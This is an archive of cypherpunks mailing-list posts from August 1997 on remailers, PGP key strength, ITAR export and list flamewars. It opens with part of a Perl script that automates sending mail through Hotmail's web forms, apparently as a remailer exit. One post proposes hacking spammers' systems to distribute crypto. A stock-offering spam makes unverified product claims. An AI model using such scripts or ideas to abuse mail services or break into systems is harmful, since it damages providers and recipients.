$body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/logout.*?)\"/io or die "Cannot compose";
$logouturl = new URI::URL $1, $url;

$request = new HTTP::Request('GET', $composeurl);
$request->header(Pragma => 'no-cache');
$response = $ua->request($request);
$body = $response->content;

$body =~ /\<\s*form\s+[^>]*action=\"(.*?)\".*?\>/io or die "Cannot send message";
$url = new URI::URL $1, $composeurl;
$body = $';
$data = '';
while(1) {
    $body =~ /^\s*\<\s*input\s+type=\"?hidden\"?\s+name=\"(.*?)\"\s+value(=\"(.*?)\")?\s*\>/io or last;
    $name = $1; $value = $3 || ""; $body = $';
    $data .= $name."=".$value."&";
}
$data .= "to=$header{'to'}&subject=$header{'subject'}&cc=$header{'cc'}&bcc=$header{'bcc'}&body=${msg}&Send.x=1&Send.y=1";

$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content($data);
$response = $ua->request($request);
$body = $response->content;

$request = new HTTP::Request('GET', $logouturl);
$request->header(Pragma => 'no-cache');
$response = $ua->request($request);






From dlv at bwalk.dm.com  Tue Aug 12 20:19:09 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Aug 1997 11:19:09 +0800
Subject: Fuck the usenet cabal
Message-ID: <87scBe10w165w@bwalk.dm.com>



I came up with yet another brilliant idea.

Stanford Wallace's Cyberpromo site has been hacked by some criminals, but
it's coming back.  In particular, he's giving away free autoresponders again.

(An autoresponder is an address at cyberpromo.com to which you can send an
e-mail and get back a pre-recorded response, if your site accepts e-mail
from cyberpromo.  Supposedly anyone can set one of them up for free
and provide their own automatic response. Stanford is running a promotion.)

Now, suppose some non-US person sets up an auto-responder that sends out
strong crypto software, and another non-US person requests it and gets it.

Is anyone going to be guilty of ITAR violations?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From wombat at mcfeely.bsfs.org  Tue Aug 12 20:30:16 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Wed, 13 Aug 1997 11:30:16 +0800
Subject: Guy Polis--2nd FORGERY
In-Reply-To: 
Message-ID: <33F0289F.5DB1@mcfeely.bsfs.org>



Tim May wrote: 
> Rabid Wombat wrote:
> >Dr.Dimitri Vulis KOTM wrote:
> >> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> >> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> >> like a bad troll intended to make the folks who promote the use of crypto
> >> look like, well, crackpots. Be warned.
> >
> >Tim May wrote:
> >>  Yeah, and like we're gun-nuts, too!
> 
> Actually, I didn't write that. Just another forgery from "Toto" (I am
> presuming, from past admissions and from the "wombat.sk.sympatico.ca"
> origins).

> >The mammalian jackass is also claiming that all crypto promoters
> > are marsupials.

Neither did I write the above. This is really getting old. You'd think
the guy would at least learn how to forge a message header after all
this time. It just goes to show that people ought to pay more attention
to the headers on their email.
Otherwise, you never know when it's just somebody being an asshole.

-rw
There's something wrong when I'm marsupial under an increasing number of
laws.
Only one response to the vertabrae grabbers is warranted: "Death to
Dinosaurs!"






From dlv at bwalk.dm.com  Tue Aug 12 21:33:04 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Aug 1997 12:33:04 +0800
Subject: He he he
In-Reply-To: <33F0289F.5DB1@mcfeely.bsfs.org>
Message-ID: <2wwcBe12w165w@bwalk.dm.com>



Rabid Wombat  doesn't write:

>
> > >The mammalian jackass is also claiming that all crypto promoters
> > > are marsupials.
>
> Neither did I write the above. This is really getting old. You'd think
> the guy would at least learn how to forge a message header after all
> this time. It just goes to show that people ought to pay more attention
> to the headers on their email.
> Otherwise, you never know when it's just somebody being an asshole.

I was about to tell the poor R.W. that he was indeed being an asshole, when
I took another good look at the headers.  He he he.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From enoch at zipcon.net  Tue Aug 12 23:09:31 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Wed, 13 Aug 1997 14:09:31 +0800
Subject: sendhotmail, version 1.2
In-Reply-To: <5sqrsc$c8k$1@abraham.cs.berkeley.edu>
Message-ID: <19970813052800.32038.qmail@zipcon.net>



Ian writes:

> Here's version 1.2 of sendhotmail.

This is truly beautiful.  How long until hotmail is the default for
everything coming out of a mixmaster that isn't going to another
remailer?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From anon at anon.efga.org  Tue Aug 12 23:26:54 1997
From: anon at anon.efga.org (Anonymous)
Date: Wed, 13 Aug 1997 14:26:54 +0800
Subject: A peculiar notion
Message-ID: 



                    "Central government spending had
                soared from less than 2 percent of the economy's total
                output to well over 20 percent in 1865, approximately
                what the central government spends today.

                     "It is hard to decide from which angle that statistic
                is more astonishing: that government spending rose
                from such infinitesimal lows to today's heights in four
                years, or that today federal authorities regularly spend
                during peacetime as much as they did during the
                country's most devastating war."  -- Jeffrey Rogers
                Hummel










From stewarts at ix.netcom.com  Tue Aug 12 23:42:14 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 13 Aug 1997 14:42:14 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: 
Message-ID: <3.0.2.32.19970812102351.0334fdc4@popd.ix.netcom.com>



At 01:10 PM 8/12/97 +0200, Patrick Oonk wrote:
>Is this what the cypherpunks list has become ? Discussions about religion ?
>
>If so, I am out of here...

Cypherpunks, like many other large groups, have a lot of opinionated people
who can be counted on to respond to a troll.  This one was, ummm,
created a few days ago, but it'll go away or evolve into other species of
flamewar, given enough time and chance :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Wed Aug 13 00:46:38 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 13 Aug 1997 15:46:38 +0800
Subject: Encrypting same data with many keys...
In-Reply-To: 
Message-ID: <3.0.2.32.19970813003535.0068e9b4@popd.ix.netcom.com>



At 05:37 PM 8/12/97 -0500, amp at pobox.com wrote:
>So would that then be a possible weakness in encrypting to multiple 
>recipients with PGP? Probably not, since the actual data is encrypted with 
>idea.

The actual data is encrypted with IDEA, but the identical IDEA key is 
encrypted with each recipient's RSA key.  To avoid this attack,
PGP uses random padding after the IDEA key (which makes the message
encrypted with RSA different for each recipient, avoiding the trap.
Since IDEA keys are 128 bits long, and RSA moduli are typically 384-2047,
there's plenty of room for random noise in the format.)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Wed Aug 13 00:50:26 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 13 Aug 1997 15:50:26 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708121110.NAA25127@atro.pine.nl>
Message-ID: <3.0.2.32.19970813001521.02fa4080@popd.ix.netcom.com>



At 09:31 AM 8/12/97 -0700, Tim May wrote:
>At 4:10 AM -0700 8/12/97, Patrick Oonk wrote:
>>Is this what the cypherpunks list has become ? Discussions about religion ?
>>If so, I am out of here...
>
>The list is about what people discuss. It is up to all readers to write
>articles that are interesting.
>
>Merely sitting back and waiting for good articles is seldom fruitful.

Or at least _forge_ some good articles you wish somebody else had written....
:-)

				Klaus! von Future Composite






From admin at cyberspacetechnologies.com  Wed Aug 13 02:05:07 1997
From: admin at cyberspacetechnologies.com (David D. W. Downey)
Date: Wed, 13 Aug 1997 17:05:07 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <19970812121230.24614@bywater.songbird.com>
Message-ID: 




On 12-Aug-97 Kent Crispin wrote:
>>On Tue, Aug 12, 1997 at 12:46:02PM -0600, John Kelsey wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>[ To: cypherpunks at algebra.com, Wei Dai ## Date: 08/08/97 10:37 pm ##
>>  Subject: Re: Eternity Uncensorable? ]
>>
>>>Subject: Re: Eternity Uncensorable?
>>>To: Cypherpunks Lite 
>>>From: Wei Dai 
>>>Date: Wed, 06 Aug 1997 11:33:55 -0700 (PDT)
>>
>>>I suggest using information dispersal to spread risk amongst
>>>remailer operators.  Use Rabin's information dispersal technique
>>>to divide up a document into n shares such that k of them can
>>>reconstruct the original, and post each share via a seperate
>>>remailer.  It would be hard for the government to single out an
>>>operator to go after since an individual share by itself is
>>>useless.
>>
>>I'm a little concerned with the usefulness of this idea in a
>>legal sense.  Imagine the physical analogue:  Alice buys the
>>guns and masks, and leaves them in a pre-arranged place.  Bob
>>anonymously buys a car and leaves it, with the keys inside, in
>>another pre-arranged place.  Carol and Dave collect the guns,
>>masks, and the car, and use them to rob a bank or hijack an
>>airplane.  Do you suppose the feds will have any problem
>>prosecuting Alice and Bob for their part in the conspiracy?
>
>Yes, I think there might be problems for the feds in this case.  Your 
>analogy is not at all accurate, since the remailers have no knowledge 
>of what their individual shares contain, and didn't supply any of the 
>input data to begin with.  Here's a different analogy:
>
>Alice and Bob and Carol and Dave run mailbox outlets.  Elmer and Fred
>jointly rent several mailboxes.  Elmer mails a single piece of a gun
>to each mailbox in a sealed package -- ABCD can have no way of
>knowing what is in each package.  Fred goes to each mailbox and gets
>the package inside, takes them all home, and assemble a weapon used 
>to commit a crime.  It is hard to see how ABCD could be included in 
>any conspiracy, because they were providing a general, legal service, 
>and they had absolutely no knowledge of the conspiracy.
>
>-- 
>Kent Crispin				"No reason to get excited",
>kent at songbird.com			the thief he kindly spoke...
>PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
>http://songbird.com/kent/pgp_key.html

----------------------------------
E-Mail: David D. W. Downey 
Date: 08/13/97
Time: 04:45:33

This message was sent by XF-Mail
----------------------------------






From admin at cyberspacetechnologies.com  Wed Aug 13 02:21:00 1997
From: admin at cyberspacetechnologies.com (David D. W. Downey)
Date: Wed, 13 Aug 1997 17:21:00 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <19970812121230.24614@bywater.songbird.com>
Message-ID: 





  The Feds will undoubtably attempt to procecute, but the way the federal law re
ads, 
ABCD Company must have some sort of knowledge in their possesion that conspirato
rs C and D
were actually planning something criminal. Without that knowledge, the governmen
t can not 
prove the technicals needed for a conviction.    Scenario: Say the conspirators 
committed a 
murder.  Malice Afore-thought is crucial to a premeditated murder conviction. 
The conspirators could be convicted of premeditated murder because they showed m
alice 
aforethought when they purchased and used the weapons involved in the killing. 
   Now, ABCD Company can not be charged with premeditated murder as they did not
 take part 
in the actual killing. That leaves aiding and abetting, and co-conspiring to com
mit a 
felony (aka the premeditiated murder.) ABCD Company would lose if they had culpa
ble knowledge
 1) what the contents of the packages were, and 2) what the conspirators were pl
anning. 
    But the Feds would be unable to show malice aforethought on the part of ABCD
 
Company, thereby blowing the co-conspirator charge out the window. In addition, 
culpable 
knowledge would not be proven because they did not know the contents of the pack
ages, 
thereby blowing the aiding and abetting charges out the window. The Feds' case w
ould hinge 
upon the requirement that ABCD Company know the contents of anything moving thro
ugh their
 buisiness. Since their business is legally based upon anonymous mailing abiliti
es, they 
can basically tell the government to go blow up a battleship for all the chances
 the Feds 
have of winning.>
>Yes, I think there might be problems for the feds in this case.  Your 
>analogy is not at all accurate, since the remailers have no knowledge 
>of what their individual shares contain, and didn't supply any of the 
>input data to begin with.  Here's a different analogy:
>
>Alice and Bob and Carol and Dave run mailbox outlets.  Elmer and Fred
>jointly rent several mailboxes.  Elmer mails a single piece of a gun
>to each mailbox in a sealed package -- ABCD can have no way of
>knowing what is in each package.  Fred goes to each mailbox and gets
>the package inside, takes them all home, and assemble a weapon used 
>to commit a crime.  It is hard to see how ABCD could be included in 
>any conspiracy, because they were providing a general, legal service, 
>and they had absolutely no knowledge of the conspiracy.
>
>-- 
>Kent Crispin				"No reason to get excited",
>kent at songbird.com			the thief he kindly spoke...
>PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
>http://songbird.com/kent/pgp_key.html

----------------------------------
E-Mail: David D. W. Downey 
Date: 08/13/97
Time: 04:51:15

This message was sent by XF-Mail
----------------------------------






From admin at CyberSpaceTechnologies.com  Wed Aug 13 02:42:39 1997
From: admin at CyberSpaceTechnologies.com (David D. W. Downey)
Date: Wed, 13 Aug 1997 17:42:39 +0800
Subject: Discussion Topic (Re: The BIG Lie (Jesus Confesses))
In-Reply-To: 
Message-ID: 



    Even I am sick of this thread. I made an error in judgement in replying to a
 letter. 
I have apologized publicly to all invloved and yet this thread *still* continues
. How about we 
get back to the subject this list was designed for? Here, I'll even start.


     Under PGP 2.63, you are able to generate 2048 bit keys. Now, from everythin
g that I have read, 
it should be impossible to break these keys even use of a Cray computer. (Estima
tes os to cost were 
roughly in the neighborhood of .30 cents a minute, and approximately 1.8 years p
rocessing
 time if done with a Cray. My question is this. Are there any known attacks that
 have 
yielded success against that level of encryption without the plaintext being kno
wn under PGP?
     Also, does anyone know if the 4098 bit keys under PGP 5.0 are stronger or w
eaker? I noticed 
that the alogrythm has been changed as well as the LIB used. (THe MIT version us
es the RSALIB and the 
international version uses the MPLIB). It is the number of bits used that throws
 me. 
If the 2048 bit keys are unbreakable from 63, then why the need for 4098 bits no
w, unless there is a good 
chance that the bit level is close to being broken if not broken already. That w
ould jump the 
computing time and cost out of this world, considering that the cost jumps expon
entially per *bit*!
    Anyone have an answer? Are the 2048 bit keys under 2.63 breakable at  by the
 US Government or other 
such entities? Are my technical ideas behind my question correct, or do I have t
hem all wrong?
 Any point in the right direction will be welcome. Thanks.
>Again, if you want discussion, discuss already.
>
>Complaining that others are not writing the articles you want to read is
>never fruitful.
>
>Probably you'll be happier doing what you said you were going to do, leaving.
>
>--Tim May
>
>There's something wrong when I'm a felon under an increasing number of laws.
>Only one response to the key grabbers is warranted: "Death to Tyrants!"
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^1398269     | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."

----------------------------------
E-Mail: David D. W. Downey 
Date: 08/13/97
Time: 05:19:41

This message was sent by XF-Mail
----------------------------------






From zooko at xs4all.nl  Wed Aug 13 03:14:06 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Wed, 13 Aug 1997 18:14:06 +0800
Subject: I am not a cracker
Message-ID: <199708131004.MAA18514@xs1.xs4all.nl>




Several journalists have approached me at HIP and afterwards 
for quotes about cracking.  It is interesting that merely by 
showing up at HIP and by having a suspiciously pseudonym-like 
name (hey, my parents were inspired by New Age psychology or 
something, okay?) I have apparently gained the instant 
reputation of being into cracking.


So in case any journalists out there were considering asking me
how to crack Tamagotchis (I kid you not-- that was the topic):

I work in computer security.  I devise systems.  I write code.
I examine systems for weaknesses.  I test systems.  But I don't
crack.  The last time I wrote a Trojan log-in screen was in 9th
grade.  When I made a phone call at HIP I used my pre-paid 
phone card instead of using the cracked phone booth for free. 
I pay for most of my software, other than Microsoft operating 
systems.



So look elsewhere for your cracker quotes.


Sincerely,

Zooko, Journeyman Hacker






From zooko at xs4all.nl  Wed Aug 13 03:17:17 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Wed, 13 Aug 1997 18:17:17 +0800
Subject: HIP hip hooray
Message-ID: <199708130952.LAA17846@xs1.xs4all.nl>



 A million monkeys operating under the pseudonym 
 "Mark Grant " typed:
>
> Hey, Zooko! You were the only Cypherpunk who made the article in the
> 'Independent' (by that blonde reporter who was wandering around), though
> Lucky Green was mentioned by name.


Wow.  Oh how the mighty have fallen, from an adulatory spread 
in Wired to a mention in The Independent.  And to think that 
Lucky was the fellow who was supposed to get the most benefit 
from the situation in the first place!


> '"[hacking] can be a wonderful thing", explained Zooco, a member of the
> CypherPunks. "Pretty much every useful aspect of modern computing was
> devised by hackers -- like the Internet and email."'
> 
> So did she spell your name wrong, or were you using a pseudonym ;-) ?


I sound like an idiot, so I'm glad she mispelled my name.


Also that's a pretty darn loose quote.  The "--" there, for 
example, spans several sentences of conversation...


Did the article print her e-mail address?


Thanks,

Z






From nobody at REPLAY.COM  Wed Aug 13 03:29:59 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 13 Aug 1997 18:29:59 +0800
Subject: Autoresponder Crypto Export / Re: Fuck the usenet cabal
Message-ID: <199708131019.MAA07324@basement.replay.com>



Dr.Dimitri Vulis KOTM wrote:

> Now, suppose some non-US person sets up an auto-responder that sends out
> strong crypto software, and another non-US person requests it and gets it.

  How about hacking spammer's systems and setting them up so that
their autoresponders send out copies of strong crypto?
  Everyone in the world would have a copy within days.

  Make the enemy your best friend.

Sun Tzu






From nobody at REPLAY.COM  Wed Aug 13 03:30:43 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 13 Aug 1997 18:30:43 +0800
Subject: The BIG Lie (Jesus Confesses)
Message-ID: <199708131023.MAA07806@basement.replay.com>



Patrick Oonk wrote:

> But hey, I just killfile everyone that discusses religion :)

  Your last two posts discuss religion.
  Killfile yourself!

KillFileMonger







From nobody at REPLAY.COM  Wed Aug 13 03:56:25 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 13 Aug 1997 18:56:25 +0800
Subject: Diffie-Hellman
Message-ID: <199708131047.MAA10062@basement.replay.com>



Timothy Maypole styles his facial hair to look more like pubic hair.

_  O     O  _
 \-|-\_/-|-/  Timothy Maypole
  /^\   /^\
 ^^ ^^ ^^ ^^






From zooko at xs4all.nl  Wed Aug 13 03:57:17 1997
From: zooko at xs4all.nl (Zooko Journeyman)
Date: Wed, 13 Aug 1997 18:57:17 +0800
Subject: journalism, travel and manufacturing
Message-ID: <199708131033.MAA00102@xs2.xs4all.nl>




 A million monkeys operating under the pseudonym 
 "Dr. Dmitri Vulis, KOTM " typed:

> Do drop by whenever you're in NYC. :-)


I appreciate the invitation.  I'll be sure to do so when I'm in
NYC.


In other news, I made some t-shirts at HIP.  On the front they
have an excerpt of an e-mail message looking something like 
this:


  From: Stan 
  To: Winston <1072SmithW at citizenunits.org>
  Subject: MAKE FREEDOM FAST!!!

  "I may disagree with every spam you send,
   but I will defend to the death your right
   to send it."

                      -- Voltaire


On the back they have the following slogans:


                MAKE FREEDOM FAST!!!

                  Spam is Speech.

              Censorship is Censorship.


And at the hem there is the legend: 


   This is: AN OFFICIAL SPAM DEFENSE T-SHIRT
   Manufactured at: HIP, 1997
   By: Zooko Industries





I gave one shirt to Alex de Joode and one to Joichi Ito, and 
I kept one for myself.  That leaves one, which I originally 
intended to snail mail to Dr. Dmitri M. Vulis, KOTM.  But if 
you don't want it then I'll auction it off via cypherpunks.  
(Currencies accepted will include PGP-signed letters stating 
your undying adoration of and loyalty to Zooko.)


Regards,

Zooko






From admin at CyberSpaceTechnologies.com  Wed Aug 13 05:20:08 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Wed, 13 Aug 1997 20:20:08 +0800
Subject: Mail Program is screwey, sorry
Message-ID: <33F1A108.2AC7AAF7@cyberspacetechnologies.com>



I apologize for the remail of the Eternity uncensorable post. I have
recently switched Linux versions and the mail program is a little bit
screwy. This one was mailed via Netscape for Linux. (Which itself is a
little screwy.) It does not send the message in the same format that it
displays on screen, as well as reposting the replied to message. I will
fix it as soon as possible. For now there may be one or two thers that
come through like this. Plese forgive them.






From nobody at neva.org  Wed Aug 13 05:40:04 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 13 Aug 1997 20:40:04 +0800
Subject: The BIG Lie (Jesus Confesses)
Message-ID: <199708131227.HAA13732@dfw-ix10.ix.netcom.com>




Patrick Oonk wrote:
> 
> Is this what the cypherpunks list has become ? Discussions about religion ?

  We killed this thread but after three days it rose again.

> If so, I am out of here...

  Don't let lightning strike you in the ass on your way out.








From dformosa at st.nepean.uws.edu.au  Wed Aug 13 05:51:15 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Wed, 13 Aug 1997 20:51:15 +0800
Subject: Fuck the usenet cabal
In-Reply-To: <87scBe10w165w@bwalk.dm.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> I came up with yet another brilliant idea.

You know doing that is dangourous.

> Stanford Wallace's Cyberpromo site has been hacked by some criminals, but
> it's coming back.  In particular, he's giving away free autoresponders again.

If we can aggarnge an anon autoresponder.  Knowing the way Standford
opperates this will not be hard.

> (An autoresponder is an address at cyberpromo.com to which you can send an
> e-mail and get back a pre-recorded response,

The only problem is that he may be using it for email collecting
persoposes.

> Now, suppose some non-US person sets up an auto-responder that sends out
> strong crypto software, and another non-US person requests it and gets it.
> 
> Is anyone going to be guilty of ITAR violations?

Well if thay can't trace it back to the person who put it on the system
thay will go after the system itself.  US goverment VS Standfor Wallus,
who ever looses We win.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/Fwn6QK0ynCmdStAQFZYQQAq0KTJ+QU/7suf5MyPozcYDiezrljRCFJ
8uWFPjxTNSXhVR0nwpZKhOO1hub/2LwK+n4njS79ngCDD0adC9of9ecoSgvrneeT
qySrKDafhEKcGS3aZ3RtwsGgWPB2lmWTIJULzj279+yWbSDV6x1nJrnSomZsT9qZ
Mgn04ILdUu4=
=1BLo
-----END PGP SIGNATURE-----






From patrick at atro.pine.nl  Wed Aug 13 06:05:44 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Wed, 13 Aug 1997 21:05:44 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708131227.HAA13732@dfw-ix10.ix.netcom.com>
Message-ID: <199708131251.OAA04072@atro.pine.nl>



> 
> 
> 
> Patrick Oonk wrote:
> > 
> > Is this what the cypherpunks list has become ? Discussions about religion ?
> 
>   We killed this thread but after three days it rose again.
> 
> > If so, I am out of here...
> 
>   Don't let lightning strike you in the ass on your way out.

At least I don't hide behind a remailer.

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From dlv at bwalk.dm.com  Wed Aug 13 07:05:56 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Aug 1997 22:05:56 +0800
Subject: HIP hip hooray
In-Reply-To: <199708130952.LAA17846@xs1.xs4all.nl>
Message-ID: 



Zooko Journeyman  writes:

>  A million monkeys operating under the pseudonym
>  "Mark Grant " typed:
> >
> > Hey, Zooko! You were the only Cypherpunk who made the article in the
> > 'Independent' (by that blonde reporter who was wandering around), though
> > Lucky Green was mentioned by name.
>
> Wow.  Oh how the mighty have fallen, from an adulatory spread
> in Wired to a mention in The Independent.  And to think that
> Lucky was the fellow who was supposed to get the most benefit
> from the situation in the first place!

His Real True Name is Lucky Orange.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Wed Aug 13 07:08:40 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Aug 1997 22:08:40 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> > Now, suppose some non-US person sets up an auto-responder that sends out
> > strong crypto software, and another non-US person requests it and gets it.
> >
> > Is anyone going to be guilty of ITAR violations?
>
> Well if thay can't trace it back to the person who put it on the system
> thay will go after the system itself.

Another related thought: some folks send out lots of unwanted e-mail
offering to broadcast an ad to a million addresses for $40 or some such.

What if a non-US person paid them $40 to spam people outside the U.S.
with strong crypto?

Is it possible to stuff a blatant ITAR violation into about 100 lines of ascii?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From gturk at concentric.net  Wed Aug 13 07:21:22 1997
From: gturk at concentric.net (gturk at concentric.net)
Date: Wed, 13 Aug 1997 22:21:22 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: <3.0.3.32.19970813101000.009dceb0@pop3.concentric.net>



At 10:06 PM 8/12/97 -0400, Michael Froomkin wrote:
>On Tue, 12 Aug 1997, Steve Schear wrote:
>> I don't think the North would have accepted any withdrawl, not matter 
>> how it was decided within the South.
>
>right.

The North would never have accepted the withdrawal, because it would have
meant the North's economic demise. 

'The name of our federation is not Consolidated States, but United States.
 A number of States held together by coercion, or the point of a bayonet,
would not be a Union.  Union is necessarily voluntary -- the act of
choice, free association.  Nor can this voluntary system be changed to one
of force without the destruction of "The Union"... A Union of States
necessarily implies separate sovereignties, voluntarily acting together.
And to bruise these distinct sovereignties into one mass of power is,
simply, to destroy the Union -- to overthrow our system of government.' --
Judge Abel P. Upshur in "The Federal Government: Its True Nature and
Character", 1840.

In other words, the Union characterized by free choice, voluntary
association and other libertarian concepts was replaced during the Civil
War by a subtly despotic "Union" under Lincoln.

-geoff






From gasmaster at internetemedia.net  Wed Aug 13 23:07:14 1997
From: gasmaster at internetemedia.net (gasmaster at internetemedia.net)
Date: Wed, 13 Aug 1997 23:07:14 -0700 (PDT)
Subject: Initial Public Offering for Gasmaster International
Message-ID: 


THIS EMAIL IS NEITHER AN OFFER TO SELL NOR A SOLICITATION OF AN OFFER
TO BUY THESE SECURITIES.  THE OFFERING IS MADE BY THE U-7 DISCLOSURE
DOCUMENT ONLY.

All securities are offered through Intrepid Securities, Inc., 
Torrance CA. Intrepid is a member of the NASD and is SIPC insured.  

Gasmaster International, Inc. is a leader in magnetic field technology 
to create turbulence within the flow of fuel with it's patented Fuel 
Flow System.  This turbulence increases the burning efficiency of the 
fuel, which results in improved fuel economy and a reduction in 
emissions.  Gasmaster has Fortune 500 clients with applications from 
boilers to diesel engines.  

The GASMASTER Fuel Flow System (FFS) was evaluated recently by 
Hawthorne Machinery Co., the San Diego Caterpillar dealer. It was 
tested on a Caterpillar 3406 B engine in a Class 8 Peterbuilt
Tractor. The vehicle is used daily to deliver equipment in their 
Rental Division.

During the 28-day test period the vehicle accumulated 4,060 miles 
with the following results:

               13% better fuel economy
               26% reduction in opacity 
                   (the black stuff coming out of the exhaust)

Overall, the worldwide market for the GASMASTER(r) Fuel Flow System 
is considered to range well over $1 billion dollars within the 
major industrial markets alone, with major extensions in consumer 
applications also possible.

The minimum investment is 300 shares at $2 per share ($600).

For more information just click on:   

http://www.prestigeipo.com/special.htm

http://www.prestigeipo.com     

Don Jones

--------------------------------------------------------------
PrestigeIPO respects your online time and Internet privacy. 
This is a one-time mailing, your name will be deleted from 
our files.  However, if you are interested in receiving more 
information, updates or future newsletters, please type 
"subscribe" into the subject line of your reply. Thank you!
--------------------------------------------------------------






From sunder at brainlink.com  Wed Aug 13 08:16:49 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Wed, 13 Aug 1997 23:16:49 +0800
Subject: Why the government should protect our privacy
In-Reply-To: 
Message-ID: 



On Tue, 12 Aug 1997, Declan McCullagh forwarded this bit of text
written by Marc Rotenberg of EPIC who wrote:

> Declan is absolutely right. Good thing there are no real
> privacy officials in the federal government and no privacy
> laws for the Internet to get in the way of these efforts.
> 
> Has anyone else noticed that the most sweeping proposals
> for surveillance are coming from the administration that
> has backed the fewest privacy laws of any administration
> in 30 years?
> 
> Mere coincidence? I don't think so.
> 
> Marc.

Like duh, citizen unit privacy protection is anathema to Big Brother
snooping on said citizen units, why should they care about our privacy?
They slowly chiseled away our constitutional rights to the point where we
can barely fight them.

I've recently attended a SpyKing seminar here in NYC (same week as HOPE)
and it was amazing the amount of info you can social engineer out of
people.  The biggest leaks: your bank, Cable TV, gas & electric companies.

Big Brother might as well not bother to keep records with the wealth of
info kept by the corporations.  But that won't stop them.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From declan at well.com  Wed Aug 13 08:30:26 1997
From: declan at well.com (Declan McCullagh)
Date: Wed, 13 Aug 1997 23:30:26 +0800
Subject: "Leotards and the Law," morphed child porn lawsuit, from Netly
Message-ID: 





---------- Forwarded message ----------
Date: Wed, 13 Aug 1997 08:07:47 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship at vorlon.mit.edu
Subject: "Leotards and the Law," morphed child porn lawsuit, from Netly

---

http://pathfinder.com/netly/opinion/0,1042,1287,00.html

The Netly News Network (http://netlynews.com/)
August 13, 1997
   
Leotards And The Law
by Declan McCullagh (declan at well.com)
   
        Take an erotic photo of an adult and alter it in Photoshop to
